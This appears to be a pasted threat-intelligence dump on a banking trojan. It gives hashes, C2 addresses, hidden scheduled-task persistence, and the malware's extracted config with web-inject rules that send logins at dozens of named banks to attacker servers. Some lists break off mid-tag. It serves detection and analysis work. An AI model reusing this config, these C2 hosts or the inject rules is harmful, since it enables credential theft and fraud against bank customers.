Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Hashes :
- malware.exe : bda9ea15da9a520513276b709c26d822
- compiler-stamp : (Fri Aug 04 08:39:27 2017)
- Loc: %Roaming%\winapp\
- client_id : c9f921548796ca07a51c77aa61486f27
- group_tag : 8a28cb8da1ce9c1e0a91df18f99ed36e
- injectDll64 : 803842eeb83b6d8618fcb59c0d490867
- systeminfo64 : b06b375b380e769d563fe37d9f3e2e59
- dinj : 41fe74239746ba40f2f64ec8d811e9a2
- dpost : f762c88e05cb6a8cf8f76426964a94c7
- sinj : 4a698f7b4b7fe49ad901fdb775808bdb
- PDB :
- C:\Work\Sharn\GetSystemInfo_solution\x64\Release\GetSystemInfo.pdb
- Traffic Observed :
- https://195.88.208.193/tt0002/
- 186.103.161.204/tt0002/ComputerName.ID/Number/NAT%20status/client%20is%20behind%20NAT/0/ ; I am the one who NATs ... sorry, couldn't resist
- https://186.103.161.204/tt0002/ComputerName.ID/Number/systeminfo/GetSystemInfo/c3VjY2Vzcw==/systeminfo/ ; c3VjY2Vzcw== = success
- https://195.88.208.202:447/tt0002/ComputerName.ID/Number/injectDll64/
- Persistence :
- Created a scheduled task <services update>from the time of infection to start %roamind%\winapp\malware(whatever it's called here).exe
- - At log on of <username>
- - Daily @ whatever time you were initially infected : if this time is missed, start task asap option is selected
- - If instance is already running, don't start another one
- Config :
- <mcconf>
- <ver>1000032</ver>
- <gtag>tt0002</gtag>
- <servs>
- <srv>186.103.161.204:443</srv>
- <srv>191.7.30.30:443</srv>
- <srv>46.160.165.31:443</srv>
- <srv>84.238.198.166:449</srv>
- <srv>194.87.236.184:443</srv>
- <srv>151.80.84.15:443</srv>
- <srv>23.95.9.152:443</srv>
- <srv>31.220.55.47:443</srv>
- <srv>210.16.101.59:443</srv>
- <srv>64.15.75.78:443</srv>
- <srv>195.62.52.107:443</srv>
- <srv>195.88.208.193:443</srv>
- <srv>194.87.146.113:443</srv>
- <srv>194.87.92.199:443</srv>
- <srv>195.133.146.77:443</srv>
- <srv>185.82.218.117:443</srv>
- <srv>23.95.114.233:443</srv>
- </servs>
- <autorun>
- <module name="systeminfo" ctl="GetSystemInfo"/>
- <module name="injectDll"/>
- </autorun>
- </mcconf>
- <moduleconfig>
- <autostart>yes</autostart>
- <sys>yes</sys>
- <needinfo name="id"/>
- <needinfo name="ip"/>
- <autoconf>
- <conf ctl="dinj" file="dinj" period="20"/>
- <conf ctl="sinj" file="sinj" period="20"/>
- <conf ctl="dpost" file="dpost" period="60"/>
- </autoconf>
- </moduleconfig>
- Target_List:
- <igroup>
- <dinj>
- <lm>*/Authentication/Login*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- </dinj>
- <dinj>
- <lm>*/Accounts/AccountOverview.asp*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- </dinj>
- </igroup>
- <igroup>
- <dinj>
- <lm>*cey-ebanking.com/CLKCCM/*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- <ignore_mask>*.gif*</ignore_mask>
- <ignore_mask>*.jpg*</ignore_mask>
- <ignore_mask>*.png*</ignore_mask>
- <ignore_mask>*.js*</ignore_mask>
- <ignore_mask>*.css*</ignore_mask>
- <require_header>*text/html*</require_header>
- </dinj>
- </igroup>
- <igroup>
- <dinj>
- <lm>*engine/login/businesslogin*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- <ignore_mask>*.gif*</ignore_mask>
- <ignore_mask>*.jpg*</ignore_mask>
- <ignore_mask>*.png*</ignore_mask>
- <ignore_mask>*.js*</ignore_mask>
- <ignore_mask>*.css*</ignore_mask>
- <require_header>*text/html*</require_header>
- </dinj>
- </igroup>
- <igroup>
- <dinj>
- <lm>*bancofarnet.bancofar.es/*/*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- <ignore_mask>*.gif*</ignore_mask>
- <ignore_mask>*.jpg*</ignore_mask>
- <ignore_mask>*.png*</ignore_mask>
- <ignore_mask>*.js*</ignore_mask>
- <ignore_mask>*.css*</ignore_mask>
- <require_header>*text/html*</require_header>
- </dinj>
- <dinj>
- <lm>*bancofarnet.bancofar.es/favicon.ico?*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- </dinj>
- </igroup>
- <igroup>
- <dinj>
- <lm>*unicaja*es*/PortalServle*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- <ignore_mask>*.gif*</ignore_mask>
- <ignore_mask>*.jpg*</ignore_mask>
- <ignore_mask>*.png*</ignore_mask>
- <ignore_mask>*.js*</ignore_mask>
- <ignore_mask>*.css*</ignore_mask>
- <require_header>*text/html*</require_header>
- </dinj>
- <dinj>
- <lm>*unicaja*es*/favicon.ico*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- </dinj>
- </igroup>
- <igroup>
- <dinj>
- <lm>*netteller.com/login2008/Authentication*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- </dinj>
- <dinj>
- <lm>https://*.netteller.com/favicon.ico?*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- </dinj>
- </igroup>
- <igroup>
- <dinj>
- <lm>*/isum/Main?ISUM_SCR=login&loginType=accesoSeguro&ISUM_Portal*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- <ignore_mask>*.gif*</ignore_mask>
- <ignore_mask>*.jpg*</ignore_mask>
- <ignore_mask>*.png*</ignore_mask>
- <ignore_mask>*.js*</ignore_mask>
- <ignore_mask>*.css*</ignore_mask>
- <require_header>*text/html*</require_header>
- </dinj>
- </igroup>
- <igroup>
- <dinj>
- <lm>*/business/j_security_check*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- </dinj>
- <dinj>
- <lm>*/business/login/Login.jsp*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- </dinj>
- <dinj>
- <lm>*/business/cts_security_precheck*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- </dinj>
- <dinj>
- <lm>https://secure.*/LookAndFeel/Common/images/common/share.png?favicon.ico*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- </dinj>
- </igroup>
- <igroup>
- <dinj>
- <lm>*.com/pub/html/login.html*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- </dinj>
- <dinj>
- <lm>*.com/pub/html/favicon.ico*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- </dinj>
- </igroup>
- <igroup>
- <dinj>
- <lm>*/outil/UAUT*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- <ignore_mask>*.gif*</ignore_mask>
- <ignore_mask>*.jpg*</ignore_mask>
- <ignore_mask>*.png*</ignore_mask>
- <ignore_mask>*.js*</ignore_mask>
- <ignore_mask>*.css*</ignore_mask>
- <require_header>*text/html*</require_header>
- </dinj>
- </igroup>
- <igroup>
- <dinj>
- <lm>https://www.creditmutuel.fr/*/*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- <ignore_mask>*.gif*</ignore_mask>
- <ignore_mask>*.jpg*</ignore_mask>
- <ignore_mask>*.png*</ignore_mask>
- <ignore_mask>*.js*</ignore_mask>
- <ignore_mask>*.css*</ignore_mask>
- <require_header>*text/html*</require_header>
- </dinj>
- <dinj>
- <lm>https://www.creditmutuel.fr/favicon.ico*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- </dinj>
- </igroup>
- <igroup>
- <dinj>
- <lm>https://entreprises.secure.societegenerale.fr/</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- </dinj>
- <dinj>
- <lm>https://entreprises.secure.societegenerale.fr/*.html</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- <ignore_mask>*.gif*</ignore_mask>
- <ignore_mask>*.jpg*</ignore_mask>
- <ignore_mask>*.png*</ignore_mask>
- <ignore_mask>*.js*</ignore_mask>
- <ignore_mask>*.css*</ignore_mask>
- <require_header>*text/html*</require_header>
- </dinj>
- <dinj>
- <lm>https://entreprises.secure.societegenerale.fr/favicon.ico?*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- </dinj>
- </igroup>
- <igroup>
- <dinj>
- <lm>*entreprises.natixis.com/jcms*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- <ignore_mask>*.gif*</ignore_mask>
- <ignore_mask>*.jpg*</ignore_mask>
- <ignore_mask>*.png*</ignore_mask>
- <ignore_mask>*.js*</ignore_mask>
- <ignore_mask>*.css*</ignore_mask>
- <require_header>*text/html*</require_header>
- </dinj>
- <dinj>
- <lm>*entreprises.natixis.com/favicon.ico*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- </dinj>
- </igroup>
- <igroup>
- <dinj>
- <lm>https://www.icgauth.banquepopulaire.fr/WebSSO_BP/_*html*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- <ignore_mask>*.gif*</ignore_mask>
- <ignore_mask>*.jpg*</ignore_mask>
- <ignore_mask>*.png*</ignore_mask>
- <ignore_mask>*.js*</ignore_mask>
- <ignore_mask>*.css*</ignore_mask>
- <require_header>*text/html*</require_header>
- </dinj>
- <dinj>
- <lm>https://*banquepopulaire.fr*asp*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- <ignore_mask>*.gif*</ignore_mask>
- <ignore_mask>*.jpg*</ignore_mask>
- <ignore_mask>*.png*</ignore_mask>
- <ignore_mask>*.js*</ignore_mask>
- <ignore_mask>*.css*</ignore_mask>
- <require_header>*text/html*</require_header>
- </dinj>
- <dinj>
- <lm>https://*banquepopulaire.fr/favicon.ico?*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- </dinj>
- </igroup>
- <igroup>
- <dinj>
- <lm>*cajasur.es/*/*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- <ignore_mask>*.gif*</ignore_mask>
- <ignore_mask>*.jpg*</ignore_mask>
- <ignore_mask>*.png*</ignore_mask>
- <ignore_mask>*.js*</ignore_mask>
- <ignore_mask>*.css*</ignore_mask>
- <require_header>*text/html*</require_header>
- </dinj>
- <dinj>
- <lm>*kutxabank.es/*/*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- <ignore_mask>*.gif*</ignore_mask>
- <ignore_mask>*.jpg*</ignore_mask>
- <ignore_mask>*.png*</ignore_mask>
- <ignore_mask>*.js*</ignore_mask>
- <ignore_mask>*.css*</ignore_mask>
- <require_header>*text/html*</require_header>
- </dinj>
- <dinj>
- <lm>*cajasur.es/favicon.ico*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- </dinj>
- <dinj>
- <lm>*kutxabank.es/favicon.ico*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- </dinj>
- </igroup>
- <igroup>
- <dinj>
- <lm>https://www.caja-ingenieros.es/*/*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- <ignore_mask>*.gif*</ignore_mask>
- <ignore_mask>*.jpg*</ignore_mask>
- <ignore_mask>*.png*</ignore_mask>
- <ignore_mask>*.js*</ignore_mask>
- <ignore_mask>*.css*</ignore_mask>
- <require_header>*text/html*</require_header>
- </dinj>
- <dinj>
- <lm>https://www.caja-ingenieros.es/favicon.ico?*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- </dinj>
- <dinj>
- <lm>https://be.caja-ingenieros.es/BEWeb/3025/6025/*</lm>
- <hl>http://162.220.162.140/response.php</hl>
- <pri>100</pri>
- <sq>2</sq>
- <ign
- <slist>
- <sinj>
- <mm>https://www.bankline.natwest.com*</mm>
- <sm>https://www.bankline.natwest.com/CWSLogon/logon.do*</sm>
- <nh>ccsarewkpsmofyibdhqcgvnltzxj.net</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://www.bankline.rbs.com*</mm>
- <sm>https://www.bankline.rbs.com/CWSLogon/logon.do*</sm>
- <nh>cdsarpwtfdxysnmgejvzbicolqku.net</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://www.business.hsbc.co.uk*</mm>
- <sm>https://www.business.hsbc.co.uk*</sm>
- <nh>crsavugwrictqdmkhxnjfzlsyeoa.net</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://www.nwolb.com*</mm>
- <sm>https://www.nwolb.com/default.aspx*</sm>
- <nh>cqsauvfqrkchbptxelozmsdyainj.net</nh>
- <url404>*/ServiceManagement/GenericErrorPageNoMenu.aspx?ErrorPage=PNF*</url404>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://www6.rbc.com*</mm>
- <sm>https://www6.rbc.com/webapp/ukv0/signin/logon.xhtml*</sm>
- <nh>chsaryoxijedlfktmvupsbqzcwgh.net</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://www.rbsdigital.com*</mm>
- <sm>https://www.rbsdigital.com/default.aspx*</sm>
- <nh>cksadrwyqvgokpitzunjhfslamex.net</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://lloydslink.online.lloydsbank.com*</mm>
- <sm>https://lloydslink.online.lloydsbank.com/Logon*</sm>
- <nh>dcsadhevyqfzwmcnsiobtpjkalrg.net</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://www.ulsterbankanytimebanking.ie*</mm>
- <sm>https://www.ulsterbankanytimebanking.ie/default.aspx*</sm>
- <nh>ddsamcpfbxhavswtquzjgiykelnd.net</nh>
- <url404>/ServiceManagement/GenericErrorPageNoMenu.aspx?ErrorPage=PNF</url404>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://banking.bankofscotland.co.uk*</mm>
- <sm>https://banking.bankofscotland.co.uk/Logon*</sm>
- <nh>dbsajondmzrvtqkflybcseipuawg.net</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://businessbanking*.tdcommercialbanking.com*</mm>
- <sm>https://businessbanking*.tdcommercialbanking.com/WBB/Login*</sm>
- <nh>basabroxpcnqfdteyhazwlgmvsji.net</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://online-business.bankofscotland.co.uk*</mm>
- <sm>https://online-business.bankofscotland.co.uk/business*</sm>
- <nh>bcsaqnrhsiztfouvcdmpklwabgje.net</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://transtasman.online.anz.com*</mm>
- <sm>https://transtasman.online.anz.com/client*</sm>
- <nh>rqsccqwzhiksmjuefrlxptbogvyd.net</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://www.anzdirect.co.nz*</mm>
- <sm>https://www.anzdirect.co.nz/online/EnterANZDirect.do*</sm>
- <nh>rhscjefivzbwxdprlhksnmoqcgay.net</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://online.coutts.com*</mm>
- <sm>https://online.coutts.com/eBankingCouttsLogin/login*</sm>
- <nh>qasaswzlpmdufjxevhociqngybrt.net</nh>
- <url404>*/error_path/404.html*</url404>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://business.co-operativebank.co.uk*</mm>
- <sm>https://business.co-operativebank.co.uk/corp/*</sm>
- <nh>qcsavktmfwlsohxunbzdcerpgaqi.net</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://fdonline.co-operativebank.co.uk*</mm>
- <sm>https://fdonline.co-operativebank.co.uk/corp*</sm>
- <nh>hbsabvronpckthldjquyaigsfmez.net</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://corporate.metrobankonline.co.uk*</mm>
- <sm>https://corporate.metrobankonline.co.uk/servlet/BrowserServlet*</sm>
- <nh>bosaxblkqnivecuwaygptrzfmshd.com</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://www2?.bmo.com*</mm>
- <sm>https://www2?.bmo.com/ctpauth/CTPEAILogin/CustUserPasswordAuthServlet?TAM_OP=login*</sm>
- <nh>bosdhymixgdkzqrabfctswelopvj.org</nh>
- <url404>https://www2?.bmo.com/ctpauth/CTPEAILogin/CustUserPasswordAuthServlet?TAM_OP=login?ERROR_CODE=0x00000000*</url404>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://www.onlinebanking.iombank.com*</mm>
- <sm>https://www.onlinebanking.iombank.com/default.aspx*</sm>
- <nh>kdsawblqdhtngzmuksyiaxjefcro.net</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://bank.barclays.co.uk*</mm>
- <sm>https://bank.barclays.co.uk/olb/auth/LoginLink.action*</sm>
- <nh>kbsavjthsyofzqnpburdxgciweam.net</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://corporate.santander.co.uk*</mm>
- <sm>https://corporate.santander.co.uk/LOGSCU_NS_ENS*</sm>
- <nh>obsamphtznlewckfbauqgvsrodxy.com</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://leumionline.bankleumi.co.uk*</mm>
- <sm>https://leumionline.bankleumi.co.uk*</sm>
- <nh>ohsaotjprgfakvxwulnyqzdsechm.com</nh>
- <url404>/my.policy</url404>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://onlinebusiness.lloydsbank.co.uk*</mm>
- <sm>https://onlinebusiness.lloydsbank.co.uk/business*</sm>
- <nh>absadbagplqcmskyjntuewxhzvfo.com</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://s2b.standardchartered.com*</mm>
- <sm>https://s2b.standardchartered.com/ssoapp/login.jsp*</sm>
- <nh>rdsamhxbjqfidyonavurlgtzwkes.com</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://cmo.cibc.com*</mm>
- <sm>https://cmo.cibc.com*</sm>
- <nh>cdsaskoevwfubrtjgyqmnizcalhx.org</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://www.anztransactive.anz.com*</mm>
- <sm>https://www.anztransactive.anz.com/*</sm>
- <nh>rcsamanqryvkdfjoblezxtiwsuhc.org</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://bbonline.banksa.com.au*</mm>
- <sm>https://bbonline.banksa.com.au/html/cbank.asp*</sm>
- <nh>rrsalxeyfboznkgajwvspmturqdh.org</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://ibs.bankwest.com.au*</mm>
- <sm>https://ibs.bankwest.com.au/BWLogin/rib.aspx*</sm>
- <nh>rqsaceayxbnfhvuqdswplmkzjtoi.org</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://netteller2.tsw.com.au*</mm>
- <sm>https://netteller2.tsw.com.au/delphi/ntv451.asp*</sm>
- <nh>rhsaevfyuirhsbnzakxpdtlmocgq.org</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://businessonline.westpac.com.au*</mm>
- <sm>https://businessonline.westpac.com.au/esis/Login/SrvPage*</sm>
- <nh>rssamvybridtxocunwpaqlhzgefs.org</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://online.corp.westpac.com.au*</mm>
- <sm>https://online.corp.westpac.com.au/*</sm>
- <nh>rksalhodzprnvuqxsfgmkyeictja.org</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://www?.my.commbiz.commbank.com.au*</mm>
- <sm>https://www?.my.commbiz.commbank.com.au/Logon/UserMaintenance/Login.aspx*</sm>
- <nh>qosaxuavegqkomtyndjzcbplhisw.org</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://bbonline.bankofmelbourne.com.au*</mm>
- <sm>https://bbonline.bankofmelbourne.com.au/html/login.aspx*</sm>
- <nh>qasasidoqpfhrgwykvanutzxcelj.org</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://banking.lloydsbank.com*</mm>
- <sm>https://banking.lloydsbank.com/Logon*</sm>
- <nh>qrsacdptvluyojmafikzrxwhgbqn.org</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://bank.ruralbank.com.au*</mm>
- <sm>https://bank.ruralbank.com.au/banking/RBLIBanking*</sm>
- <nh>qhsarqofnjsehzibcgvxmykapwul.org</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://nabconnect*.nab.com.au*</mm>
- <sm>https://nabconnect*.nab.com.au/auth/nabclogin/login.do*</sm>
- <nh>qksaiwgxsdkcmtqrhynvbopzaejf.org</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://ib.tmbank.com.au*</mm>
- <sm>https://ib.tmbank.com.au/ib/signon/Login.aspx*</sm>
- <nh>hosajempfozwnqlxgcbrdthivuas.org</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://digital.defencebank.com.au*</mm>
- <sm>https://digital.defencebank.com.au*</sm>
- <nh>hbsajlhrugctfpyavoqmwnbedkzi.org</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://velocity.ocbc.com*</mm>
- <sm>https://velocity.ocbc.com/portal.view*</sm>
- <nh>hksazewovfilhjutxcmdybsqkang.org</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://uniservices2.uobgroup.com*</mm>
- <sm>https://uniservices2.uobgroup.com/ELO/login.jsp*</sm>
- <nh>sosanehiqtckfxzrdjglsomvubay.org</nh>
- <srv>192.99.113.67:443</srv>
- </sinj>
- <sinj>
- <mm>https://sg.bibplus.uobgroup.com*</mm>
- <sm>https://sg.bibplus.uobgroup.com/BIB/public*</sm>
- <nh
- Task :
- <UserId>ComputerName\UserName</UserId>
- </LogonTrigger>
- <CalendarTrigger>
- <Repetition>
- <Interval>PT3M</Interval>
- <Duration>P1D</Duration>
- <StopAtDurationEnd>false</StopAtDurationEnd>
- </Repetition>
- <StartBoundary>2017-08-06T08:30:10</StartBoundary>
- <Enabled>true</Enabled>
- <ScheduleByDay>
- <DaysInterval>1</DaysInterval>
- </ScheduleByDay>
- </CalendarTrigger>
- </Triggers>
- <Principals>
- <Principal id="Author">
- <LogonType>InteractiveToken</LogonType>
- <RunLevel>LeastPrivilege</RunLevel>
- <UserId>COMPUTERNAME\USERID</UserId>
- </Principal>
- </Principals>
- <Settings>
- <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
- <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
- <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
- <AllowHardTerminate>false</AllowHardTerminate>
- <StartWhenAvailable>true</StartWhenAvailable>
- <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
- <IdleSettings>
- <StopOnIdleEnd>true</StopOnIdleEnd>
- <RestartOnIdle>false</RestartOnIdle>
- </IdleSettings>
- <AllowStartOnDemand>true</AllowStartOnDemand>
- <Enabled>true</Enabled>
- <Hidden>true</Hidden>
- <RunOnlyIfIdle>false</RunOnlyIfIdle>
- <WakeToRun>false</WakeToRun>
- <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
- <Priority>7</Priority>
- </Settings>
- <Actions Context="Author">
- <Exec>
- <Command>C:\Users\USERNAME\AppData\Roaming\winapp\malware.exe</Command>
- </Exec>
- </Actions>
- </Task>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement